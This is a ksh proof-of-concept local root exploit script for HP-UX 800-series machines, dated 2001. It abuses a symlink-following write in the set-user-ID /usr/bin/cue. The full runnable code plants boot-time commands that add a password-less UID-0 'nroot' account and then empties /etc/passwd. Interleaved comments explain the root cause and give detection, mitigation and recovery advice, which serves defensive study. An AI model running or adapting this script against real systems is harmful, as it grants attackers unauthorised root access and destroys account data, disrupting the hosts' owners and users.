`#!/usr/bin/ksh
##
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
##
## This is just a proof of concept. Don't use for malicious
## purpose. If ever you decide to run that script, please
## read the code carefully before!
##
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
## people. Good job sweethearts.
##
## Old-styled exploit, tested on HPUX 10.20, model 899
## Warning : /usr/bin/cue exists on HPUX 800 models only
##
## Let's test the model by the way...
##
## Precondition 1: take the second '/'-separated field of the
## /usr/bin/model output as the model number and stop unless it lies
## in the 800-899 range (see the header: cue ships on 800 models only).
## Defender note: the same check identifies hosts worth auditing.
MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
export MODEL
if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
then
echo "Your host doesn't look like a HPuX 8** model, stopping now."
exit
fi
##
## Test whether /usr/bin/cue exists or not...
##
## Precondition 2: -u is true only when the file exists and has its
## set-user-ID bit set. It does not check who owns the file, so the
## "setuid 0" wording in the message is an assumption, not a test.
## Defender note: a host where this test fails (binary absent or the
## set-user-ID bit removed) is not exposed to what follows.
if [ ! -u /usr/bin/cue ]
then
echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
exit
fi
##
## Well you passed the above tests. Going on playing.
## Creating a file within /etc/rc.config.d : It will
## be executed at next reboot (which might happen
## soon)
##
## TTY is the third '/'-separated field of the tty output; it is used
## below as the suffix of the file name IDMERROR.<tty>.
TTY=`tty | awk -F '/' '{print $3}'`
export TTY
## TERM is set to a made-up value, presumably so that cue hits an
## error path and writes its IDMERROR file -- TODO confirm against
## cue's documented behaviour.
TERM=whatevah
export TERM
## umask 000 removes all permission masking for files created by this
## shell and its children, cue included. The unprivileged appends to
## laninit later in the script only work if the file cue creates is
## left writable -- inferred from the script, not shown by it.
umask 000
## Root cause as the script relies on it: the set-user-ID cue
## apparently writes to IDMERROR.<tty> in the current directory and
## follows a symlink planted under that name, so the link target is
## created with cue's privilege. A privileged program should refuse
## symlinks and avoid predictable names in caller-controlled
## directories.
## Detection: symlinks named IDMERROR.* that point at system files,
## and an unexpected /etc/rc.config.d/laninit.
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null
##
## Inserting evil root account within /etc/passwd
##
## These three lines append shell commands to the file created in the
## previous step. Per the author's comments that file is run at next
## reboot. The appended commands: restore /etc/passwd from the
## /tmp/passwd copy, append an entry named nroot with an empty
## password field, UID 0, GID 3 and shell /sbin/sh, then delete
## laninit itself.
## Detection: any /etc/passwd entry with UID 0 and an empty password
## field, a /tmp/passwd file, and rc.config.d files containing
## commands that edit /etc/passwd.
echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit
##
## Now saving the passwd file, which we are about to empty
##
## The copy in /tmp is what the planted commands above restore from.
cp /etc/passwd /tmp/passwd
##
## passwd file destruction
## (SOMEONE SET US UP THE BOMB !!)
##
## Second use of the same symlink-following write: the link is
## re-pointed at /etc/passwd and cue is run again. Per the author's
## comments the result is an emptied /etc/passwd, i.e. a loss of
## availability on top of the integrity issue.
## Detection: a zero-length /etc/passwd and leftover IDMERROR.*
## symlinks in user-writable directories.
## Mitigation: remove the set-user-ID bit from /usr/bin/cue where it
## is not needed (chmod u-s /usr/bin/cue) and apply the vendor fix.
rm IDMERROR.$TTY
ln -s /etc/passwd IDMERROR.$TTY
/usr/bin/cue > /dev/null 2> /dev/null
##
## *POOF*, now that the /etc/passwd file is emptied, admin
## MUST reboot to get things done.
##
## Final messages to the operator; nothing is cleaned up here.
## Recovery on an affected host means restoring /etc/passwd from a
## trusted backup, then removing the nroot entry, /tmp/passwd,
## /etc/rc.config.d/laninit and the IDMERROR.<tty> symlink.
echo "Your nroot account will be created within /etc/passwd"
echo "with no password. Remove it asap, it's just a proof"
echo "of concept!"
# The end.
`